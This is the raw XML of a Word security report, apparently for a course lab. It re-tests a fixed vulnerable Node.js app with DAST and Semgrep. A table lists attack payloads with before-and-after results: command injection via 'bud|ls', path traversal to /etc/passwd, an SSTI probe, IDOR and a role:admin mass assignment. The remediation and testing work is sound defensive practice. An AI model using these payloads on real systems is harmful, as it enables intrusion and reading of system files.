            <w:tcW w:w="2100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Mass Assignment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1477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src/router/routes/user.js</w:t>
            </w:r>
          </w:p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:328</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009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Removed direct usage of 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req.body</w:t>
            </w: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. Explictly destructured input (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7030A0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>const { name } = req.body</w:t>
            </w:r>
            <w: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bidi="ar"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1941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en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Only specific, safe fields are passed to the database update function. Sensitive fields like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role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en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> or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7030A0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>password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002060"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> are ignored during upda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tes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="SimSun" w:cs="Segoe UI Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="SimSun" w:cs="Segoe UI Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">C2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Re-run DAST on Fixed App</w:t>
      </w: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2998"/>
        <w:gridCol w:w="1963"/>
        <w:gridCol w:w="1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605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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2145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Attack  payload </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205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Result Before Fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2517" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr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Result After Fix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605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RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2145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    Get /v1/status/bud|ls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205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Server executed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ls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and returned file list.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2517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Server returned "Status: Unknown or invalid brand".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  <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605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Path traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2145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.../beer-pic?picture=../..etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205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Server returned contents of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/etc/passwd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.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2517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Server returned "error" (file path sanitized).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605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SSTI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2145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Get /?message={{7*7}}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205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Server calculated math and displayed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49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.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2517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 xml:space="preserve">Server displayed literal text </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DM Mono" w:hAnsi="DM Mono" w:eastAsia="DM Mono" w:cs="DM Mono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{{7*7}}</w:t>
            </w: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605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IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2145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 xml:space="preserve">Get /profile?id=2    </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205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Displayed User 2's private profile.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2517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Redirected to "Error: You can only view your own profile."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605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FDEADA"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pP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</w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="12"/>
                <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Mass Assigment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2145" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FDEADA"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pP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sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>PUT /v1/user w/ role:admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205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User role updated to Admin in DB.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2517" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FDEADA"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun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smallCaps w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>User role remained unchanged (input ignored).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshots  after fix </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSTI</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="2295525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1389535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35395" name="drawing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pStyle w:val="11"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Path Traversal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="2333625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="338331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1567" name="drawing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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="SimSun" w:cs="Segoe UI Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">C3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Re-run Semgrep (Built-in + Custom Rules)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="left"/>
      </w:pP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 re-ran the static analysis using the custom ruleset developed in Phase B (semgrep-rules/custom-rules.yaml).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="left"/>
      </w:pP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Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Before Fixes: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Semgrep detected </w:t>
      </w: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10 Findings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(High/Critical severity).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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After Fixes: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Semgrep returned </w:t>
      </w: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 Findings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spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="left"/>
      </w:pP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Detailed Notes on Fixed Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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RCE Rule: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Previously matched execSync in system.js. After removing the function call and using a whitelist, the rule no longer matches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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SSTI Rule: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Previously matched renderString in frontend.js. The code now passes data securely to res.render, removing the vulnerable pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Path Traversal Rule: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Previously matched unsafe string interpolation. Usage of path.basename and path.join breaks the vulnerable pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Mass Assignment Rule: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Previously matched db.user.update(req.body). The fix explicitly defines variables (const { name }...), so the rule no longer sees a mass assignment pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="left"/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SSRF Rule:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"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Previously matched requests.get(url). The fix uses the Axios config object syntax inside a validation block, which does not match the insecure pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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SAST Evidence:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="3743325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1219239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9102" name="drawing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ource Sans Pro Black">
    <w:panose1 w:val="020B0803030403020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="600002F7" w:usb1="02000001" w:usb2="00000000" w:usb3="00000000" w:csb0="2000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Segoe UI Black">
    <w:panose1 w:val="020B0A02040204020203"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E00002FF" w:usb1="4000E47F" w:usb2="00000021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DM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4104789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LTCDO/sBAAAMBAAADgAAAGRycy9lMm9Eb2MueG1srVPBbtswDL0P2D8I&#10;ui92gmLzjDhF1yDDgG4r0O4DFFmOhVqiQCmxs68fJdtZ11166EWgJPLx8elpfT2Yjp0Ueg224stF&#10;zpmyEmptDxX/9bj7UHDmg7C16MCqip+V59eb9+/WvSvVClroaoWMQKwve1fxNgRXZpmXrTLCL8Ap&#10;S5cNoBGBtnjIahQ9oZsuW+X5x6wHrB2CVN7T6Xa85BMivgYQmkZLtQV5NMqGERVVJwKN5FvtPN8k&#10;tk2jZPjZNF4F1lWcJg1ppSYU7+OabdaiPKBwrZYTBfEaCi9mMkJbanqB2oog2BH1f1BGSwQPTVhI&#10;MNk4SFKEpljmL7R5aIVTaRaS2ruL6P7tYOWP0z0yXZMTiqtlfvWp+Ezvb4Whl39UQ2BfYGDLKFPv&#10;fEnZD47yw0DHVJJG9u4O5JNnFm5bYQ/qBhH6VomaaKbK7FnpiOMjyL7/DjW1EccACWho0EQNSRVG&#10;6PRE58sTRSoytixWRZHTlaS7eUPsMlHO5Q59+KrAsBhUHMkDCV6c7nwYU+eU2M3CTndd8kFn/zkg&#10;zHiS6EfGI/cw7IdJjj3UZxoEYbQVfSoKWsDfnPVkqYpb+kGcdd8sSRHdNwc4B/s5EFZSYcUDZ2N4&#10;G0aXHh3qQ0u4s9g3JNdOp0GiriOHiSWZJEkxGTq68Pk+Zf39xJ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ql5uc8AAAAFAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQA&#10;FAAAAAgAh07iQC0wgzv7AQAADAQAAA4AAAAAAAAAAQAgAAAAHgEAAGRycy9lMm9Eb2MueG1sUEsF&#10;BgAAAAAGAAYAWQEAAI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3211E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="119321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0B1516C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30B151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F68"/>
    <w:rsid w:val="0005823B"/>
    <w:rsid w:val="00267942"/>
    <w:rsid w:val="002F62AB"/>
    <w:rsid w:val="00320F7E"/>
    <w:rsid w:val="007316C9"/>
    <w:rsid w:val="007341A2"/>
    <w:rsid w:val="00753E46"/>
    <w:rsid w:val="009D2896"/>
    <w:rsid w:val="009D4541"/>
    <w:rsid w:val="00A9D6A1"/>
    <w:rsid w:val="00B29CBF"/>
    <w:rsid w:val="00C5312C"/>
    <w:rsid w:val="00D95F68"/>
    <w:rsid w:val="00FF262D"/>
    <w:rsid w:val="027658E6"/>
    <w:rsid w:val="030C2F16"/>
    <w:rsid w:val="04A8C71E"/>
    <w:rsid w:val="04B61A7C"/>
    <w:rsid w:val="0543C4DB"/>
    <w:rsid w:val="05961336"/>
    <w:rsid w:val="05E9C062"/>
    <w:rsid w:val="0639BDDF"/>
    <w:rsid w:val="070409A2"/>
    <w:rsid w:val="07B425E9"/>
    <w:rsid w:val="091D805A"/>
    <w:rsid w:val="09B20893"/>
    <w:rsid w:val="0AC65C3E"/>
    <w:rsid w:val="0B3E92D7"/>
    <w:rsid w:val="0BAA3FC7"/>
    <w:rsid w:val="0C03FFB2"/>
    <w:rsid w:val="0D85F4C5"/>
    <w:rsid w:val="0D957984"/>
    <w:rsid w:val="0F306644"/>
    <w:rsid w:val="0F8B2DBF"/>
    <w:rsid w:val="1047899B"/>
    <w:rsid w:val="10A02042"/>
    <w:rsid w:val="10D5BC9A"/>
    <w:rsid w:val="11AFF792"/>
    <w:rsid w:val="128A1947"/>
    <w:rsid w:val="12B0F9C8"/>
    <w:rsid w:val="12B5D3E5"/>
    <w:rsid w:val="12F278D1"/>
    <w:rsid w:val="1329B170"/>
    <w:rsid w:val="1343B84B"/>
    <w:rsid w:val="139067EA"/>
    <w:rsid w:val="13A549D1"/>
    <w:rsid w:val="13BBB6C3"/>
    <w:rsid w:val="13C6A1A2"/>
    <w:rsid w:val="14B91A70"/>
    <w:rsid w:val="15151F17"/>
    <w:rsid w:val="15965529"/>
    <w:rsid w:val="15E65632"/>
    <w:rsid w:val="16C14C65"/>
    <w:rsid w:val="174D42D2"/>
    <w:rsid w:val="1756AE9E"/>
    <w:rsid w:val="180F0641"/>
    <w:rsid w:val="1841E90E"/>
    <w:rsid w:val="18C1D111"/>
    <w:rsid w:val="18DDADA1"/>
    <w:rsid w:val="1A6212DE"/>
    <w:rsid w:val="1BAFF4B6"/>
    <w:rsid w:val="1BFFFCB8"/>
    <w:rsid w:val="1C1AA168"/>
    <w:rsid w:val="1CCA9D75"/>
    <w:rsid w:val="1D13F547"/>
    <w:rsid w:val="1D3750A8"/>
    <w:rsid w:val="1E4BA63A"/>
    <w:rsid w:val="1EB3BA08"/>
    <w:rsid w:val="20104C29"/>
    <w:rsid w:val="20A6D528"/>
    <w:rsid w:val="20DF6EA6"/>
    <w:rsid w:val="21042D44"/>
    <w:rsid w:val="2130A6D5"/>
    <w:rsid w:val="21C35956"/>
    <w:rsid w:val="21C83151"/>
    <w:rsid w:val="2237BC10"/>
    <w:rsid w:val="228E922F"/>
    <w:rsid w:val="22FC013D"/>
    <w:rsid w:val="232FAA76"/>
    <w:rsid w:val="2367087F"/>
    <w:rsid w:val="23A511DB"/>
    <w:rsid w:val="23DA2536"/>
    <w:rsid w:val="24239EA6"/>
    <w:rsid w:val="242D9299"/>
    <w:rsid w:val="243F4290"/>
    <w:rsid w:val="24B5FC85"/>
    <w:rsid w:val="251B3FAE"/>
    <w:rsid w:val="25BD8563"/>
    <w:rsid w:val="25E1A762"/>
    <w:rsid w:val="269C516A"/>
    <w:rsid w:val="26D7A3B2"/>
    <w:rsid w:val="29293903"/>
    <w:rsid w:val="29322D40"/>
    <w:rsid w:val="29BF285C"/>
    <w:rsid w:val="29D4F77D"/>
    <w:rsid w:val="2A50A141"/>
    <w:rsid w:val="2A9E96D6"/>
    <w:rsid w:val="2AD882FD"/>
    <w:rsid w:val="2B5EF677"/>
    <w:rsid w:val="2C9EF838"/>
    <w:rsid w:val="2CE094EA"/>
    <w:rsid w:val="2D2258A4"/>
    <w:rsid w:val="2D7DEA34"/>
    <w:rsid w:val="2DE09283"/>
    <w:rsid w:val="2E41AD3F"/>
    <w:rsid w:val="2EB8F132"/>
    <w:rsid w:val="2FCD18A6"/>
    <w:rsid w:val="30D317F9"/>
    <w:rsid w:val="31A75089"/>
    <w:rsid w:val="323568F2"/>
    <w:rsid w:val="325124E3"/>
    <w:rsid w:val="32910046"/>
    <w:rsid w:val="34227B62"/>
    <w:rsid w:val="34928DAB"/>
    <w:rsid w:val="34B4D732"/>
    <w:rsid w:val="353A2B7D"/>
    <w:rsid w:val="35681C8A"/>
    <w:rsid w:val="359567F6"/>
    <w:rsid w:val="35C86E5A"/>
    <w:rsid w:val="36226EF4"/>
    <w:rsid w:val="362E1EDC"/>
    <w:rsid w:val="36D425AD"/>
    <w:rsid w:val="383B25CD"/>
    <w:rsid w:val="38588340"/>
    <w:rsid w:val="388A23A9"/>
    <w:rsid w:val="3970FBD2"/>
    <w:rsid w:val="3A48D72E"/>
    <w:rsid w:val="3A89FA12"/>
    <w:rsid w:val="3BC49488"/>
    <w:rsid w:val="3D152DDB"/>
    <w:rsid w:val="3D196B0C"/>
    <w:rsid w:val="3D3991CB"/>
    <w:rsid w:val="3D7BEFDF"/>
    <w:rsid w:val="3DE5E6F1"/>
    <w:rsid w:val="3E43915E"/>
    <w:rsid w:val="3E7005C3"/>
    <w:rsid w:val="3F6D7718"/>
    <w:rsid w:val="3FB81B84"/>
    <w:rsid w:val="3FB98A4A"/>
    <w:rsid w:val="40543C5F"/>
    <w:rsid w:val="40AF8422"/>
    <w:rsid w:val="422A2DBA"/>
    <w:rsid w:val="422A8794"/>
    <w:rsid w:val="42DBBC3E"/>
    <w:rsid w:val="42EF1281"/>
    <w:rsid w:val="433450B1"/>
    <w:rsid w:val="437247C6"/>
    <w:rsid w:val="43880E30"/>
    <w:rsid w:val="44971B9E"/>
    <w:rsid w:val="44BA96DD"/>
    <w:rsid w:val="453BA758"/>
    <w:rsid w:val="45DB6C86"/>
    <w:rsid w:val="45E7F0E3"/>
    <w:rsid w:val="46115DBD"/>
    <w:rsid w:val="46493765"/>
    <w:rsid w:val="466E1B02"/>
    <w:rsid w:val="4678ED4F"/>
    <w:rsid w:val="468EAF2A"/>
    <w:rsid w:val="4707C90B"/>
    <w:rsid w:val="47E4A759"/>
    <w:rsid w:val="47E98EE6"/>
    <w:rsid w:val="48316E65"/>
    <w:rsid w:val="485AC0EA"/>
    <w:rsid w:val="490E45DD"/>
    <w:rsid w:val="496B50A0"/>
    <w:rsid w:val="4A606190"/>
    <w:rsid w:val="4A6B080C"/>
    <w:rsid w:val="4ABDEEB2"/>
    <w:rsid w:val="4B5BBB80"/>
    <w:rsid w:val="4CDE4338"/>
    <w:rsid w:val="4CF2470F"/>
    <w:rsid w:val="4E5C98AE"/>
    <w:rsid w:val="4E630B6D"/>
    <w:rsid w:val="4E915A90"/>
    <w:rsid w:val="4F31F9D9"/>
    <w:rsid w:val="4F53A15B"/>
    <w:rsid w:val="4F7F6697"/>
    <w:rsid w:val="4F8C08D5"/>
    <w:rsid w:val="4FBE3017"/>
    <w:rsid w:val="4FDB943B"/>
    <w:rsid w:val="500DA951"/>
    <w:rsid w:val="5098CC90"/>
    <w:rsid w:val="50E8ECB2"/>
    <w:rsid w:val="50F155C7"/>
    <w:rsid w:val="51914BE5"/>
    <w:rsid w:val="5212C3F7"/>
    <w:rsid w:val="524D6407"/>
    <w:rsid w:val="5389169B"/>
    <w:rsid w:val="54707C67"/>
    <w:rsid w:val="54AE7437"/>
    <w:rsid w:val="54D52167"/>
    <w:rsid w:val="54E1FEE8"/>
    <w:rsid w:val="554E7ED5"/>
    <w:rsid w:val="5551B029"/>
    <w:rsid w:val="56D55C81"/>
    <w:rsid w:val="573F073C"/>
    <w:rsid w:val="57CDD66F"/>
    <w:rsid w:val="57EC9C0B"/>
    <w:rsid w:val="582E72E1"/>
    <w:rsid w:val="58653585"/>
    <w:rsid w:val="5895EA46"/>
    <w:rsid w:val="59AA075A"/>
    <w:rsid w:val="5A992A74"/>
    <w:rsid w:val="5AC67EB8"/>
    <w:rsid w:val="5B6689E9"/>
    <w:rsid w:val="5BDBB1E8"/>
    <w:rsid w:val="5DEACB3E"/>
    <w:rsid w:val="5DEF2FDB"/>
    <w:rsid w:val="5E1DB6BC"/>
    <w:rsid w:val="5E310551"/>
    <w:rsid w:val="5E509B8A"/>
    <w:rsid w:val="5ECEC48F"/>
    <w:rsid w:val="5F080BD9"/>
    <w:rsid w:val="5F5965BD"/>
    <w:rsid w:val="5F7138F5"/>
    <w:rsid w:val="5F8508D3"/>
    <w:rsid w:val="5FBA421C"/>
    <w:rsid w:val="5FEC1138"/>
    <w:rsid w:val="60B50B18"/>
    <w:rsid w:val="61C5B928"/>
    <w:rsid w:val="640FEFF1"/>
    <w:rsid w:val="6531D383"/>
    <w:rsid w:val="6577432B"/>
    <w:rsid w:val="65A30C65"/>
    <w:rsid w:val="66DBE5CA"/>
    <w:rsid w:val="66E88698"/>
    <w:rsid w:val="66EE52F1"/>
    <w:rsid w:val="68FFB4D4"/>
    <w:rsid w:val="6932F8AF"/>
    <w:rsid w:val="6AB6A519"/>
    <w:rsid w:val="6B31C133"/>
    <w:rsid w:val="6B74B731"/>
    <w:rsid w:val="6CAB21FA"/>
    <w:rsid w:val="6DD3573F"/>
    <w:rsid w:val="6E559C62"/>
    <w:rsid w:val="6E967731"/>
    <w:rsid w:val="6F0F5929"/>
    <w:rsid w:val="6F7EBEAF"/>
    <w:rsid w:val="7081007B"/>
    <w:rsid w:val="70CB62AE"/>
    <w:rsid w:val="710D50D0"/>
    <w:rsid w:val="7256C016"/>
    <w:rsid w:val="72DAAFE6"/>
    <w:rsid w:val="74C6CE7E"/>
    <w:rsid w:val="74FB9375"/>
    <w:rsid w:val="7501F893"/>
    <w:rsid w:val="75CD0C27"/>
    <w:rsid w:val="75E3B155"/>
    <w:rsid w:val="771C9FDB"/>
    <w:rsid w:val="7722353C"/>
    <w:rsid w:val="77278987"/>
    <w:rsid w:val="77BA5927"/>
    <w:rsid w:val="780EF0D3"/>
    <w:rsid w:val="78110D6A"/>
    <w:rsid w:val="78F64490"/>
    <w:rsid w:val="7B4A681D"/>
    <w:rsid w:val="7C3A66A8"/>
    <w:rsid w:val="7C9E9EEC"/>
    <w:rsid w:val="7CC77099"/>
    <w:rsid w:val="7D81F8A9"/>
    <w:rsid w:val="7D89A1B3"/>
    <w:rsid w:val="7DA96996"/>
    <w:rsid w:val="7E121DE5"/>
    <w:rsid w:val="7E230CAD"/>
    <w:rsid w:val="7E443C45"/>
    <w:rsid w:val="7F273F79"/>
    <w:rsid w:val="7F7F9ED6"/>
    <w:rsid w:val="7FF1C563"/>
    <w:rsid w:val="7FF2B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DengXian" w:cs="Times New Roman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100" w:beforeAutospacing="1" w:after="100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3">
    <w:name w:val="heading 3"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100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0">
    <w:name w:val="Hyperlink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100" w:beforeAutospacing="1" w:after="100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2">
    <w:name w:val="Strong"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="13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Kimo Store</Company>
  <TotalTime>7</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate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2025-12-17T20:49:00Z</dcterms:created>
  <dc:creator>Kimo Store</dc:creator>
  <cp:lastModifiedBy>Body Islam</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-18T21:00:59Z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1D0229E7C91C46F0B40BDF6A0B78FCF8_12</vt:lpwstr>
  </property>
</Properties>
</file>